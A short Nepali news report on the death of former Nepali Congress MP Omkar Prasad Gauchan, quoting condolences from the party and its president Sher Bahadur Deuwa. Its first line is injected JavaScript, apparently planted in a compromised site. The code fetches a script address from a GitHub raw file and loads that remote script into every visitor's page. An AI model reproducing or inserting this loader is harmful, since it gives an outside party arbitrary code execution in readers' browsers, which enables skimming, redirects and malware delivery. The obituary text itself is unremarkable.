;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
कार्तिक २७,
काठमाडौं । नेपाली कांग्रेसका पूर्व सांसद, पूर्व राज्यमन्त्री, ओमकारप्रसाद गौचनको निधन् प्रती दुःख ब्यक्त गरेको छ ।
गौचनको बुधबार बिहान ४ः३० बजे काठमाडौँमा उपचारका क्रममा निधन भएको थियो । उनी लुम्बिनी विकास कोषका पूर्व उपाध्यक्ष रहेका थिए । उनको ८५ वर्षीयको उमेरमा बुधबार निधन भएको थियो । गौचन राजनीतिक क्षेत्रका साथै विकासप्रेमी र समाजसेवीका रुपमा समेत परिचित थिए ।
उनीको २०४८ सालमा बाग्लुङ निर्वाचन क्षेत्र नं. ३ बाट सांसद पदमा निर्वाचित भएका थिए । स्वर्गीय गौचनले नेपालको लोकतान्त्रिक आन्दोलन र पार्टी संगठनमा सक्रिय भूमिका निर्वाह गरेका थिए । उनको निधनबाट नेपाली कांग्रेसले एक अग्रज व्यक्तित्वलाई गुमाएको कांग्रेसले उल्लेख गरेको मुख्य सचिव कृष्णप्रसाद पौडेलले जारी गरेको शोक प्रस्तावमा उल्लेख छ।
त्यस्तै कांग्रेसका सभापति शेरबहादुर देउवाले गौचनको निधनप्रति गहिरो दुःख व्यक्त गर्दै “नेपाली कांग्रेसका अग्रज व्यक्तित्व ओमकारप्रसाद गौचनको निधनको खबरले मलाई अत्यन्त मर्माहत र स्तब्ध बनाएको छ भनेका छन् । स्वर्गीय गौचनले राजनीतिका साथै विकास र सामाजिक क्षेत्रमा पुर्याउनुभएको, सक्रिय योगदान सदा स्मरणीय रहिरहनेछ देउवाले भनेका छन् ।
फेसबुक प्रतिक्रियाहरु